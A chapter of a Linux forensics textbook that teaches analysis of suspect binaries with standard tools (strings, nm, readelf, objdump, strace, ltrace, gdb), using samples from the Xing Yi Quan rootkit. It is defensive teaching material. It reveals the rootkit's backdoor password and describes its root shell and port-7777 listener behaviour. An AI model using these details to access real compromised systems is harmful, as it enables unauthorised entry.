The National Institute of Standards and Technology (NIST) maintains a large database of hashes known as the National Software Reference Library (NSRL). At present there are over 40 million MD5 hashes in this database. Updates to NSRL are released four times a year. In order to avoid the need to download this massive 6GB database and get more frequent updates, a query server has been set up.
Using the NSRL query server requires the installation of a program known as nsrllookup. This program can be obtained from the following URL on github: https://github.com/rjhansen/nsrllookup/archive/v1.2.3.tar.gz. This program is very easy to use. Simply pipe an MD5 hash to it like so: md5sum <suspicious file> | nsrllookup. If the hash is unknown, it will be echoed back to you. If you prefer to see only known hashes, add the -k flag. Running nsrllookup against a set of files is shown in Figure 10.3.
FIGURE 10.3
Running nsrllookup against a list of files. None of the files in this directory are in the NSRL, as can be seen by running nsrllookup with the -k switch.
The NSRL contains known files, both good and bad. If you do get a hit, you will need to get the details from the NSRL website to decide if a file is malicious or benign. These queries can be performed at http://www.hashsets.com/nsrl/search. An example known-good Linux binary is shown in Figure 10.4.
FIGURE 10.4
An entry in the NSRL Reference Data Set (RDS) for a known Linux binary.
Using strings
In most cases your file will not be listed in the MHR or NSRL. These databases are best used to whittle down the files to be examined if you have lots of suspect files. The strings utility will search a binary file for ASCII text and display whatever it finds. The syntax for the command is strings -a <suspicious file>. Partial results from running the command strings -a xingyi_bindshell are shown in Figure 10.5. Pathnames to temporary files and what could be a password are highlighted in the figure.
FIGURE 10.5
Running strings on a suspicious binary.
You may want to capture the output from strings to a file. Any strange and unique words, such as “sw0rdm4n” and “xingyi”, can be used for Google searches. You may see several strings of the form <function>@@<library> that can tell you what library functions are being used in this code. You will only see these strings if debugging symbols have not been removed with strip. The results of running strings xingyi_bindshell | grep @@ | sort are shown in Figure 10.6.
FIGURE 10.6
Displaying library functions with strings. Note that this only works for binaries that haven’t been stripped.
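The idea behind strings, and the grep for @@ that follows it, can be approximated in a few lines of Python. This is a rough sketch, not a reimplementation of the real utility: the function names are invented for this example, the four-character minimum is an assumption chosen for the sketch, and the sample bytes are made up rather than taken from the rootkit.

```python
import re


def ascii_strings(data, min_length=4):
    """Return runs of printable ASCII bytes at least min_length long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
    return [match.decode("ascii") for match in pattern.findall(data)]


def versioned_imports(strings_found):
    """Keep entries of the form <function>@@<library>, sorted."""
    return sorted(text for text in strings_found if "@@" in text)


if __name__ == "__main__":
    # Made-up bytes standing in for part of an unstripped binary.
    sample = b"\x00\x01/tmp/.x\x00ab\x00popen@@GLIBC_2.2.5\x00"
    found = ascii_strings(sample)
    print(found)
    print(versioned_imports(found))
```

Saving the full list to a file, as suggested above, makes it easy to search for unusual words later without rerunning the extraction.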
Listing symbol information with nm
The nm utility is used to list symbols from an object (binary) file. This command produces a list of symbols along with their addresses (if applicable) and symbol type. Some of the more prevalent types are shown in Table 10.1. Generally speaking, lowercase symbols denote local symbols and uppercase symbols represent external (global) scope. The output from nm can give some insight into the unknown file, by providing called library functions, local function names, and variable names. Naturally, if these symbols have been stripped using the strip command, nm has no symbols to list. Partial output from running nm against the xingyi_bindshell file is shown in Figure 10.7. Several suspicious function and variable names can be seen in the figure.
Table 10.1. Common nm symbol types.
Type    Description
A       Absolute (will not change)
B       Uninitialized data section (BSS)
C       Common symbol (uninitialized data)
D       Symbol is in the initialized data section
G       Symbol is in an initialized data section for small objects
N       Symbol is a debugging symbol
R       Symbol is in read-only data section
S       Symbol is in uninitialized data section for small objects
T       Symbol is in the code (text) section
U       Symbol is undefined. Usually this means it is external (from a library)
V, W    Weak symbol (can be overridden)
?       Unknown symbol type
FIGURE 10.7
Partial output from running nm against xingyi_bindshell.
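When nm produces a long listing, it can help to sort the symbols by type and scope. The sketch below assumes the default nm layout of address, type letter, and name separated by whitespace, with the address column blank for undefined symbols. The function name and the sample lines are hypothetical and are not copied from Figure 10.7.

```python
def parse_nm_line(line):
    """Split one line of default nm output into address, type, name, scope."""
    parts = line.split()
    if len(parts) == 2:
        # Undefined (U) symbols are printed without an address.
        address, symbol_type, name = None, parts[0], parts[1]
    elif len(parts) == 3:
        address, symbol_type, name = int(parts[0], 16), parts[1], parts[2]
    else:
        raise ValueError("unexpected nm line: %r" % line)
    if symbol_type.isupper():
        scope = "global"
    elif symbol_type.islower():
        scope = "local"
    else:
        scope = "unknown"  # for example the '?' type
    return {"address": address, "type": symbol_type, "name": name, "scope": scope}


if __name__ == "__main__":
    # Hypothetical sample lines in nm's default format.
    for sample in ("0000000000400f2b T main",
                   "                 U popen@@GLIBC_2.2.5",
                   "0000000000602100 b buffer"):
        print(parse_nm_line(sample))
```

Filtering the parsed entries for type U gives a quick list of the library functions the binary expects to import.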
Listing shared libraries with ldd
Most of the previous sections came with the caveat that these tools rely on binaries that haven’t been stripped. Stripping binaries is a common practice for a couple of reasons. First, removing the symbols can result in a significantly smaller executable. Second, stripping the file makes it harder to reverse engineer (whether or not it is malware). What can you do if the file has been stripped?
If shared libraries are used (which is almost certainly the case), then the program must be able to find them. Also, the names of any functions used in shared libraries must be somewhere in the program. The net of this, assuming no obfuscation techniques have been employed, is that the strings command will tell you the names of functions called and ldd will tell you shared libraries used. The names of the shared libraries cannot easily be obfuscated since doing so would cause the program’s build process (specifically, the last step called linking) to fail.
The syntax for ldd is simply ldd <binary>. The results of running ldd against xingyi_bindshell and a stripped copy of the same are shown in Figure 10.8. Note that the results are identical. The file command was also run on one of the shared libraries, libc-2.19.so. There are two versions of this library, one with debugging symbols and one without.
FIGURE 10.8
Running ldd against a binary and the same binary that has been stripped of all symbols.
I THINK IT IS MALWARE
If checking a few hash databases and Googling some of the words you found in the file produces no results, it is time to dig deeper into the file. A natural place to start would be examining the overall file structure. Once you have a high-level view of what is going on, you can start drilling down and looking at the actual code if required.
Getting the big picture with readelf
Linux executables are in the Executable and Linkable Format (ELF). An ELF file is an object file, which can be viewed in two different ways, depending on what you are trying to do with it. Figure 10.9 shows the two views and different parts of the file that are relevant to each view.
FIGURE 10.9
The two views of an ELF file.
As shown in Figure 10.9, all ELF files have a header. When the file is being executed, the Program Header Table (PHT) that follows the header is read. The PHT describes various segments (large chunks) in the file. In the linking view the PHT is ignored and the Section Header Table (SHT) at the end of the file is read. The SHT describes various sections (which are subparts of segments) in the file.
The readelf utility parses different parts of an ELF file. Thanks to this handy program, there is little need to dig into the details of the ELF structures. The command readelf --file-header <file> will display the header information. The results of running this command against xingyi_bindshell are shown in Figure 10.10. From the figure, we see this is a 64-bit executable with nine program headers and thirty section headers. All ELF files begin with the “magic number” 0x7F, followed by the string “ELF”, or just 0x7F 0x45 0x4C 0x46 in hexadecimal.
FIGURE 10.10
The ELF header information for xingyi_bindshell.
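For readers curious about what readelf is decoding, the following Python sketch reads the magic number and a few header fields directly. It is a minimal illustration based on the standard ELF header layout, not a replacement for readelf. The function name is invented for this example, and the header bytes in the usage section are synthetic: only the counts of nine program headers and thirty section headers come from the text above, while the entry address and string table index are hypothetical.

```python
import struct

ELF_MAGIC = b"\x7fELF"  # 0x7F 0x45 0x4C 0x46


def parse_elf_header(data):
    """Decode selected fields from the start of an ELF file."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}[data[4]]       # EI_CLASS
    endian = {1: "<", 2: ">"}[data[5]]   # EI_DATA: 1 = LSB, 2 = MSB
    # Fields after the 16-byte e_ident array; address and offset fields
    # are 8 bytes wide in 64-bit files and 4 bytes wide in 32-bit files.
    layout = "HHIQQQIHHHHHH" if bits == 64 else "HHIIIIIHHHHHH"
    (e_type, e_machine, _version, e_entry, _phoff, _shoff, _flags,
     _ehsize, _phentsize, e_phnum, _shentsize, e_shnum,
     _shstrndx) = struct.unpack_from(endian + layout, data, 16)
    return {"bits": bits,
            "little_endian": endian == "<",
            "type": e_type,
            "machine": e_machine,
            "entry": e_entry,
            "program_headers": e_phnum,
            "section_headers": e_shnum}


if __name__ == "__main__":
    # Synthetic 64-bit little endian header; entry address is hypothetical.
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)
    body = struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x400000, 64, 0, 0,
                       64, 56, 9, 64, 30, 27)
    print(parse_elf_header(ident + body))
```

To try it on a real file, read the first 64 bytes in binary mode and pass them to parse_elf_header.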
The readelf --section-headers <file> command is used to display section information. The output from running readelf --section-headers -W xingyi_bindshell is shown in Figure 10.11. The -W option specifies wide format (not restricted to 80 characters of width). The sections are described in Table 10.2. The sections from this file are fairly typical.
FIGURE 10.11
Sections from the xingyi_bindshell file.
Table 10.2. Sections from xingyi_bindshell.
Name                  Description
Null
.interp               Dynamic linker name
.note.ABI-tag         Note containing “GNU” followed by architecture information
.note.gnu.build-id    Unique ID that is the same for debug and stripped programs (displayed by file)
.gnu.hash             Describes a hash table (don’t worry if you don’t know what this is)
.dynsym               Symbol table for dynamic linking
.dynstr               Strings that are required for dynamic linking
.gnu.version          Symbol Version Table that corresponds to .dynsym
.gnu.version_r        Required symbol version definitions
.rela.dyn             Relocation information for .dynamic
.rela.plt             Relocation information for .plt
.init                 Initialization code for this program
.plt                  Procedure Linkage Table
.text                 The actual executable code (machine code)
.fini                 Termination code for this program
.rodata               Read-only data
.eh_frame_hdr         Exception handling C++ code for accessing .eh_frame
.eh_frame             Exception handling (exceptions are used for error processing)
.init_array           List of initialization code to call on startup
.fini_array           List of termination code to call on termination
.jcr                  Information to register compiled Java classes
.dynamic              Dynamic linking information
.got                  Global Offset Table (used for address resolution during relocation)
.got.plt              Global Offset Table (used for address resolution during relocation)
.data                 Initialized data
.bss                  Uninitialized data
.comment              Comment (normally for version control)
.shstrtab             Section names (section header string table)
.symtab               Symbol Table
.strtab               Symbol Table entry names
Do not be overly concerned if you don’t understand all of the sections described in Table 10.2. I would posit that the majority of professional programmers do not know about all of these either. The most important ones for our purposes are .text, .data, and .bss, which contain program code, initialized data, and uninitialized data, respectively. The fact that our file has all these sections suggests that the program was written in C, or a similar language, and compiled with GCC (the GNU Compiler Collection). In theory, this should make it easier to reverse engineer than handcrafted Assembly code.
The command readelf --program-headers <file> is used to parse the Program Header Table (PHT). The results of running this command on xingyi_bindshell are shown in Figure 10.12. As can be seen from the figure, most segments consist of a list of sections. Notable exceptions to this are segments 00 and 07, which contain the Program Header Table and stack, respectively. The description of each of these segments can be found in Table 10.3. The PHT also specifies where each segment should be loaded and what byte-alignment it requires.
FIGURE 10.12
Program Header Table for xingyi_bindshell.
Table 10.3. Segments from xingyi_bindshell.
Number and Type      Description
00 - PHDR            Program Header Table
01 - INTERP          Dynamic linker to use (/lib64/ld-linux-x86-64.so.2)
02 - LOAD            Portion of file to load into memory (first one)
03 - LOAD            Portion of file to load into memory (second one)
04 - DYNAMIC         Dynamic linking information
05 - NOTE            Extra information
06 - GNU_EH_FRAME    Exception handling information
07 - GNU_STACK       The program stack
08 - GNU_RELRO       Memory that should be read-only after relocation is done
If a file has not been stripped, readelf can be used to list symbols. Partial output from running readelf --symbols -W xingyi_bindshell is shown in Figure 10.13. Notice that this output is more verbose than that produced by nm. It is also a bit more orderly.
FIGURE 10.13
Partial output from running readelf --symbols against xingyi_bindshell.
Each of the sections may be displayed using the command readelf --hex-dump=<number or name> <file>. This can help you get some insight into the file without having to decipher the different metadata structures yourself. Running this command for a few of the sections in xingyi_bindshell is shown in Figure 10.14. From the figure, we can see the program was compiled with GCC version 4.8.2-19 for Ubuntu, should be loaded with /lib64/ld-linux-x86-64.so.2, and has the SHA Build ID of 12c43054c53c2e67b668eb566ed7cdb747d9dfda. It is probably best to avoid running this command on sections containing code as these will not be displayed in a meaningful manner. In the next section, we will cover a better tool for examining executable code.
FIGURE 10.14
Dumping a few sections from xingyi_bindshell with readelf --hex-dump.
Using objdump to disassemble code
The objdump utility can be used to get information from an object file. Much of its functionality duplicates that of readelf. One useful feature not found in readelf is the ability to disassemble object code (convert it from pure machine code to more human-readable Assembly). There are two common formats for Assembly code: Intel and AT&T. The default is to use AT&T syntax, but this can be changed using the “-M intel” option. The Intel format seems to be preferred by PC programmers. It is important to realize that disassembly with a tool like this is not perfect, as any data in the sections normally containing code will be interpreted as machine code instructions.
The command objdump --disassemble -M intel xingyi_bindshell will disassemble the sections of the file normally expected to contain code. Partial results from running this command are shown in Figure 10.15. The snippet shown is part of the main method of the program. While a complete Assembly tutorial is well out of scope for this book, an introduction to the basics can be helpful in understanding this code. Assuming the code has not been intentionally obfuscated, only a basic understanding of Assembly is required to get the gist of what is going on.
Assembly language instructions are pretty basic. They mostly consist of moving things around; simple math like addition, subtraction, and multiplication; comparing numbers; jumping to new memory addresses; and calling functions. For commands that move things around, the source and target can be memory locations or high-speed storage areas in the CPU called registers.
Some of these registers have a special purpose, and the rest are used for performing calculations or passing variables to functions. Some of the registers have been around since the 16-bit processors of old (8086, 80286), others were added when 32-bit processors were released (80386 and newer), while still others were added when AMD released the first 64-bit processors. Standard 64-bit processor registers are shown in Figure 10.16. The legacy registers are named based on width. XX, EXX, and RXX denote 16-bit, 32-bit, and 64-bit wide registers, respectively. Some 16-bit registers can be further divided into XH and XL for the high and low bytes, respectively. Using the RAX register as an example, AL, AX, EAX, and RAX represent the lowest byte, two bytes, four bytes, and all eight bytes of the register, respectively. When viewing Assembly code, you will often see different width registers used based on need.
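The relationship between the different width names can be illustrated with simple bit masks. The sketch below is only a model of how the names overlap, with a hypothetical function name and an arbitrary sample value; it does not touch real CPU registers.

```python
def register_views(rax):
    """Show the sub-register values contained in a 64-bit RAX value."""
    rax &= 0xFFFFFFFFFFFFFFFF
    return {
        "RAX": rax,                # all eight bytes
        "EAX": rax & 0xFFFFFFFF,   # lowest four bytes
        "AX": rax & 0xFFFF,        # lowest two bytes
        "AH": (rax >> 8) & 0xFF,   # high byte of AX
        "AL": rax & 0xFF,          # lowest byte
    }


if __name__ == "__main__":
    for name, value in register_views(0x1122334455667788).items():
        print(name, hex(value))
```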
The RIP (or EIP for 32-bit Assembly) register is known as the instruction pointer. It points to the address in memory where the next instruction to be run can be found. The RFLAGS register is used to keep track of status of comparisons, whether or not a mathematical operation resulted in a need to carry a bit, etc. The RBP register is known as the base pointer, and it points to the base (bottom) of the current stack frame. The RSP register is called the stack pointer, and it points to the top of the current stack frame. So what is a stack frame?
A stack frame is a piece of the stack which is associated with the currently running function in a program. So, what then is a stack? The stack is a special memory area that grows each time a new function is called via the Assembly CALL instruction and shrinks when this function completes. In C and similar languages you will hear people talk about stack variables that are automatically created when declared and go away at the end of their code block. These variables are allocated on the stack. When you think about what a function is, it is always a code block of some type. The local variables for functions are typically allocated on the stack.
When larger amounts of storage are required or variables need to live beyond a single function, variables may be created on the heap. The mechanism for getting heap space differs from one programming language to the next. If you look at the internals of how the operating system itself creates heaps and doles out memory to various processes, it is actually quite complex.
When reverse engineering applications in order to find vulnerabilities, the stack and heap play a central role in the process. For our purposes it is sufficient to understand that the stack is the most common place for functions to store their local variables. If you look back at Figure 10.15, you will see that the first instruction, push rbp, is used to save the current base pointer (bottom of the stack frame) to the stack. The current stack pointer is then moved to the base pointer with the command mov rbp,rsp (recall that the target is on the left and source on the right in Intel notation). On the next line the current value stored in RBX is saved by pushing it onto the stack. On the next line 0x88 is subtracted from the stack pointer with the instruction sub rsp,0x88.
FIGURE 10.15
Partial results from disassembling xingyi_bindshell with objdump.
You might be thinking, “Hold on a second, why did I subtract to grow the stack?” The reason for this is that the stack grows downward (from high memory addresses to low memory addresses). By moving the old stack pointer (in RSP) to the base pointer (RBP), the old top of the stack frame has become the new bottom. Subtracting 0x88 from the stack pointer allocates 0x88 bytes for the current stack frame. This new storage is used by the current function. If you look at Figure 10.15, you will see several mov instructions that move values into this newly allocated stack buffer. The destinations for all of these moves are memory addresses contained in the square brackets, which are all of the form [rbp-<some offset>].
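The effect of the four prologue instructions on RSP and RBP can be followed with a toy model. The sketch below is a simplification under stated assumptions: the Stack class and run_prologue function are invented for this example, the starting register values are hypothetical, and only the stack pointer arithmetic is modeled.

```python
class Stack:
    """Toy model of a downward-growing stack of 8-byte slots."""

    def __init__(self, rsp):
        self.rsp = rsp
        self.memory = {}

    def push(self, value):
        self.rsp -= 8                  # the stack grows toward low addresses
        self.memory[self.rsp] = value

    def pop(self):
        value = self.memory.pop(self.rsp)
        self.rsp += 8
        return value


def run_prologue(rsp, rbp, rbx, frame_size=0x88):
    """Mimic push rbp; mov rbp,rsp; push rbx; sub rsp,0x88."""
    stack = Stack(rsp)
    stack.push(rbp)          # push rbp
    rbp = stack.rsp          # mov rbp,rsp
    stack.push(rbx)          # push rbx
    stack.rsp -= frame_size  # sub rsp,0x88
    return stack, rbp


if __name__ == "__main__":
    # Hypothetical starting values, chosen only for illustration.
    stack, rbp = run_prologue(rsp=0x7FFFFFFFE000, rbp=0x7FFFFFFFE040, rbx=0)
    print("rbp =", hex(rbp), "rsp =", hex(stack.rsp))
```

After the prologue, every address of the form [rbp-<some offset>] with a small enough offset falls between the new RSP and RBP, which is the storage the function uses for its locals.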
There is also an odd instruction, xor eax,eax, among the move instructions. The bitwise exclusive-OR (XOR) operator compares each bit in two numbers, and the corresponding bit in the result is 1 if either, but not both, of the input values had a 1 in that position. The effect of XORing any number with itself is the same as setting that number to zero. Therefore, xor eax,eax is the same as mov eax,0x0. Readers who have done any shell coding will realize that use of XOR is preferred in that situation as it prevents a zero byte (which is interpreted as a NULL in many cases) from being present in code you are trying to inject.
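Both claims in the paragraph above are easy to check. The sketch below XORs a value with itself and compares the usual 32-bit machine code encodings of the two instructions. The byte sequences shown are the common encodings an assembler emits for these instructions (other valid encodings exist), and the function names are invented for this example.

```python
XOR_EAX_EAX = bytes([0x31, 0xC0])                     # xor eax,eax
MOV_EAX_ZERO = bytes([0xB8, 0x00, 0x00, 0x00, 0x00])  # mov eax,0x0


def xor_with_self(value, width_bits=32):
    """XOR a register-sized value with itself; the result is always zero."""
    mask = (1 << width_bits) - 1
    return (value ^ value) & mask


def contains_zero_byte(machine_code):
    """Report whether an encoding contains a 0x00 byte."""
    return 0 in machine_code


if __name__ == "__main__":
    print(xor_with_self(0xDEADBEEF))
    print(contains_zero_byte(XOR_EAX_EAX), contains_zero_byte(MOV_EAX_ZERO))
```

The XOR form is also three bytes shorter, which is one reason compilers commonly emit it even when zero bytes are not a concern.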
Following the block of move instructions we see a call instruction. In high level languages calling a function and passing in a bunch of parameters is pretty simple. How does this work in Assembly? There needs to be a calling convention in place that dictates how parameters are passed into and out of a function. For various technical reasons, multiple calling conventions are used based on the type of function being called. 32-bit systems normally pass in parameters on the stack (ordered from right to left). 64-bit systems normally pass in parameters in the registers RDI, RSI, RDX, RCX, R8, R9, and place any additional parameters on the stack (also ordered right to left). Return values are stored in EAX/EDX and RAX/RDX for 32-bit and 64-bit systems, respectively. One of the reasons that there are multiple calling conventions is that some functions (such as printf in C) can take a variable number of arguments. In addition to specifying where parameters are stored, a calling convention defines who is responsible (caller or callee) for returning the stack and CPU registers to their previous state just before the function was called.
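The 64-bit register assignment described above can be expressed as a small lookup. This sketch covers only integer and pointer arguments, which is an assumption made to keep it short (floating point arguments are handled differently), and the function name is hypothetical.

```python
INTEGER_ARG_REGISTERS = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]


def place_arguments(args):
    """Return (register assignments, stack push order) for integer arguments."""
    in_registers = dict(zip(INTEGER_ARG_REGISTERS, args))
    # Anything beyond six arguments goes on the stack, pushed right to left,
    # so the last argument is pushed first.
    push_order = list(reversed(args[len(INTEGER_ARG_REGISTERS):]))
    return in_registers, push_order


if __name__ == "__main__":
    print(place_arguments([0x100]))
    print(place_arguments([1, 2, 3, 4, 5, 6, 7, 8]))
```

When reading a disassembly, working backward from a call instruction to the most recent writes to RDI, RSI, and so on is usually enough to recover the arguments.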
Armed with the knowledge from the previous paragraph, we can see the two lines, mov edi,0x100 and call <n_malloc>, are used to call the n_malloc function with a single parameter whose value is 0x100 (256). The return value, a pointer to memory allocated on the heap, is then stored on the stack frame on the next line, mov QWORD PTR [rbp-0x58],rax. On the lines that follow, the putchar and popen functions are called.
The return value from the call to popen is stored in the stack frame on the line mov QWORD PTR [rbp-0x70],rax. The next line compares the return value with zero. If the return value was zero, the line je 400fe7 <main+0xbc> causes execution to jump to 0x400FE7. Otherwise, execution continues on the next line at 0x400FB2. Note that the machine code is 0x74 0x35. This is known as a short conditional jump instruction (opcode is 0x74) that tells the computer to jump forward 0x35 bytes if the condition is met. Objdump did the math for you (0x400FB2 + 0x35 = 0x400FE7), and also told you this location was 0xBC bytes from the start of the main function. There are other kinds of jumps available, for different conditions or no condition at all, and for longer distances.
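The arithmetic objdump performs for a short jump can be reproduced by hand. In the sketch below the function name is invented for this example, and the instruction address 0x400FB0 is inferred from the text (the two-byte instruction is followed by the next one at 0x400FB2) rather than read from the figure. The offset byte is treated as signed, so the same function also handles backward jumps.

```python
def short_jump_target(instruction_address, machine_code):
    """Compute the destination of a two-byte short jump such as 0x74 0x35."""
    rel8 = machine_code[1]
    if rel8 >= 0x80:          # the offset is a signed 8-bit value
        rel8 -= 0x100
    # The offset is relative to the address of the next instruction.
    next_instruction = instruction_address + len(machine_code)
    return next_instruction + rel8


if __name__ == "__main__":
    target = short_jump_target(0x400FB0, bytes([0x74, 0x35]))
    print(hex(target))         # destination of the jump
    print(hex(target - 0xBC))  # start of main, given <main+0xbc>
```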
Other than the return instruction, ret, there is only one remaining Assembly instruction found in the main function that has not yet been discussed. This instruction is not in the snippet from Figure 10.15. This instruction is lea, which stands for Load Effective Address. This instruction performs whatever calculations you pass it and stores the results in a register. There are a few differences between this instruction and most of the others. First, you may have more than two operands. Second, if some of the operands are registers, their values are not changed during the operation. Third, the result can be stored in any register, including registers not used as operands. For example, lea rax,[rbp-0x50] will load the value of the base pointer minus 0x50 (80) into the RAX register.
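The calculation lea performs can be modeled as a single expression. The sketch below uses the general x86 address form of base plus index times scale plus displacement, of which [rbp-0x50] is the simplest case (base and displacement only). The function name and the sample base pointer value are hypothetical.

```python
MASK64 = (1 << 64) - 1


def effective_address(base=0, index=0, scale=1, displacement=0):
    """Compute base + index*scale + displacement, wrapped to 64 bits."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("scale must be 1, 2, 4, or 8")
    return (base + index * scale + displacement) & MASK64


if __name__ == "__main__":
    rbp = 0x7FFFFFFFE000  # hypothetical base pointer value
    # lea rax,[rbp-0x50]: RAX receives the address, RBP is left unchanged.
    print(hex(effective_address(base=rbp, displacement=-0x50)))
```

Because nothing is read from memory, compilers also use lea as a cheap way to do arithmetic, so seeing it does not always mean an address is being computed.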
FIGURE 10.16
Registers for modern 64-bit processors.
The end of the disassembly of the main function by objdump is shown in Figure 10.17. The highlighted lines are cleanup code used to return the stack and registers to their previous state. Notice that we add back the 0x88 that was subtracted from RSP at the beginning of the function, and then pop RBX and RBP off the stack in the reverse order from how they were pushed on. Note that in the calling convention used here, it is the callee (main function in this case) that is responsible for restoring registers and the stack to their previous state. Functions (such as printf) that accept a variable number of parameters require a different calling convention, in which the caller must perform the cleanup, as the callee does not know what will be passed into the function.
FIGURE 10.17
Cleanup code at the end of the main function. Note that the lines after the ret instruction are probably data, not instructions as depicted.
The bytes after the return instruction have been misinterpreted as machine code instructions by objdump. Later when we use the GNU Debugger (gdb) to disassemble the program, all of the program will be disassembled properly. For this reason, we will delay providing the full output from objdump here.
Up to this point we have been discussing what is known as static analysis. This is essentially dead analysis of a program that is not running. While using a tool like objdump to disassemble a program might lead to some minor errors, it is safe because the program is never executed on your forensics workstation. Often this is sufficient, if your primary goal is to determine if a file is malicious or benign. You certainly could use a tool such as gdb to get a more accurate disassembly of an unknown executable, but be careful not to run the program in the debugger on your forensics workstation!
DYNAMIC ANALYSIS
Dynamic analysis involves actually running a program to see what it does. There are a number of tools that you can use to analyze an unknown program’s behavior. Before we proceed, we need to talk about safety. Think about it. Does running an unknown, possibly malicious program on your forensics workstation sound like a good idea? You have two basic choices. Either you can use some spare hardware that is disconnected from the network and only used for examining unknown files, or you can set up a virtual machine using VirtualBox, VMWare, or other virtualization software.
The separate machine is the safest option. This allows you to run the program with reckless abandon, knowing that you will re-image the machine when you are done with your analysis. Virtualization is definitely more convenient, but there is potential risk to your host machine if you misconfigure the virtual machine. If you do use virtualization, make sure that you have no network connections to the virtual machine. Also, be aware that some smart malware will detect that it is being run inside a virtual machine and refuse to run or, even worse, attempt to exploit possible vulnerabilities in the virtualization software to attack the host machine.
If you need an image for your virtual machine, you could use a fresh install of your favorite Linux distribution. If you think you will be investigating unknown binaries often, you might consider backing up the virtual disk file after you have installed all of your tools and before transferring any unknown files to the virtual machine. Remember that most virtualization software will install a NAT network interface out to the Internet, which you should disable! If you really want to duplicate the subject system, you can create a virtual machine from the subject disk image. This assumes that you have sufficient disk space, RAM, etc. The command to convert the raw image to a virtual hard disk file, if you are using VirtualBox, is vboxmanage internalcommands converthd -srcformat raw -dstformat vhd <raw image> <destination vhd file>. The PAS subject system running in a virtual machine (without networking!) is shown in Figure 10.18.
FIGURE 10.18
Running the PAS subject system in a VM after converting the raw image to a VHD file.
Tracing system calls
The strace utility can be used to trace which system calls are being made by a program. This program works by running a program and keeping track of (tracing) any system calls that are made. Never run this command against an unknown binary on your forensics workstation. Only run this inside a sandbox in a virtual machine or on your dedicated machines for malware investigation described above. In addition to being cautious when running this command, there are a few things that you should keep in mind. First, when you run the program as anyone other than root, it might fail because of permission issues. Second, if command line parameters are required, it might fail, or at least take a different execution path, which can make it hard to see what it does. Third, it may require some libraries not installed in your test environment. If this is the case, you should be able to tell, because you will see system calls attempting to load the libraries. Partial output from running strace against xingyi_bindshell is shown in Figure 10.19.
FIGURE 10.19
Partial output from running strace against xingyi_bindshell in a sandbox virtual machine.
From Figure 10.19 we can see that the C library (/lib/x86_64-linux-gnu/libc.so.6) was opened read-only and the call returned a file handle of 3. The file was read and parts of it were mapped to memory so that some of the functions in the library can be used. Three file handles automatically exist for all programs, 0, 1, and 2, for standard in (stdin), standard out (stdout), and standard error (stderr), respectively, which is why the first file opened receives handle 3. The call to write(1, “\n”, 1) is the same as calling printf(“\n”) from a C program (which is exactly what this file is). The output from strace also shows that a pipe was created using popen. Popen stands for pipe open. It is used to execute a command and then open a pipe to get the responses from the command. From the read command that follows a few lines later, it looks like the program is trying to determine the version of Python installed.
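The system calls seen in the trace can be made from Python’s os module, which is a thin wrapper over the same kernel interfaces. This sketch is only meant to connect the strace output to familiar operations and should be run on files you trust: the function names are invented for this example, /dev/null (via os.devnull) stands in for the library file, and the descriptor number returned depends on what the process already has open.

```python
import os


def write_newline_to_stdout():
    """Equivalent of write(1, "\\n", 1); returns the number of bytes written."""
    return os.write(1, b"\n")


def open_read_only(path):
    """Open a file read-only and return the descriptor the kernel assigned."""
    return os.open(path, os.O_RDONLY)


if __name__ == "__main__":
    print(write_newline_to_stdout())
    descriptor = open_read_only(os.devnull)
    # Typically 3 when only stdin, stdout, and stderr are open beforehand.
    print(descriptor)
    os.close(descriptor)
```

Running a small script like this under strace in your sandbox is a harmless way to get used to reading its output before tracing something unknown.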
Don’t think of strace as the perfect tool to help you understand how a program works. The best way to see what a program does is to trace through it with gdb. Using strace is a good starting place before moving on to gdb. The results of running strace against another Xing Yi Quan binary, xingyi_rootshell, with no command line arguments are shown in Figure 10.20. Note that the program terminated with a “wrong password” message. Rerunning this command with the “sw0rdm4n” password we discovered during static analysis leads to the results shown in Figure 10.21.
FIGURE 10.20
Running strace against xingyi_rootshell without a password.
FIGURE 10.21
Running strace against xingyi_rootshell with the correct password supplied.
If we run strace against xingyi_reverse_shell, it generates an error. If we add the IP address 127.0.0.1 to the command, it succeeds and creates a process listening on port 7777, as shown in Figure 10.22.
FIGURE 10.22
Running strace against xingyi_reverse_shell 127.0.0.1. A process listening on port 7777 is created as confirmed by running nmap.
Tracing library calls
The ltrace utility performs a similar function to strace, except that it is used to trace library calls instead of system calls. The results of running ltrace against xingyi_bindshell are shown in Figure 10.23. We can see that the C library is being loaded, 257 bytes of memory are allocated and then filled with zeros, popen is called to get the Python version, the version returned is 2.7.6, strstr is called and returns zero, fork is used to create a new process, and the program exits.
FIGURE 10.23
Running ltrace against xingyi_bindshell.
The results of running ltrace against xingyi_rootshell with the correct password supplied are shown in Figure 10.24. We can see that the C library is loaded, 18 bytes of memory are allocated and then set to zero, up to 16 characters of a string are stored in a string buffer (probably the password passed in, but we need to trace the program with gdb to verify this), a string is compared to “sw0rdm4n” and found to be identical, a file descriptor is duplicated, and a bash shell is created using the C system function.
FIGURE 10.24
Running ltrace against xingyi_rootshell with the correct password supplied.
The results of running ltrace against xingyi_reverse_shell 127.0.0.1 are shown in Figure 10.25. We can see the C library is loaded, the string length of “127.0.0.1” is checked repeatedly, fork is called creating process 3116, and two warnings are printed before the program exits when Control-C is pressed. A new process listening on port 7777 has been created.
FIGURE 10.25
At this point we have enough information about these binaries to say that they are malicious. We know that they create listening sockets, shells, and have other common malware traits. If we want to learn more, it is time to use a debugger.
Using the GNU Debugger for reverse engineering
The GNU debugger, gdb, is the standard debugger for Linux programmers. It is very powerful. Unfortunately, all this power comes with a bit of a learning curve. There are some Graphical User Interface (GUI) front ends to gdb, but the tool is command line based. I will only hit the highlights in this book. For a full course on how to get the most from gdb, I recommend the GNU Debugger Megaprimer at PentesterAcademy.com (http://www.pentesteracademy.com/course?id=4).
Before we get started, I feel that I should point out that gdb was not designed to be used for reverse engineering. There are other debuggers tailor-made for reverse engineering. Of these, IDA Pro is perhaps the most popular. With pricing that starts in excess of US$1100, IDA Pro is not for the casual reverse engineer, however.
To load a program into gdb, simply type gdb <executable>. You should see some messages about your file, concerning whether or not it contained debugging symbols (most files you examine likely lack the extra debugging information), a statement that says to type “help” to get help, and then a (gdb) prompt. Typing help leads to the screen shown in Figure 10.26.
FIGURE 10.26
The gdb main help screen.
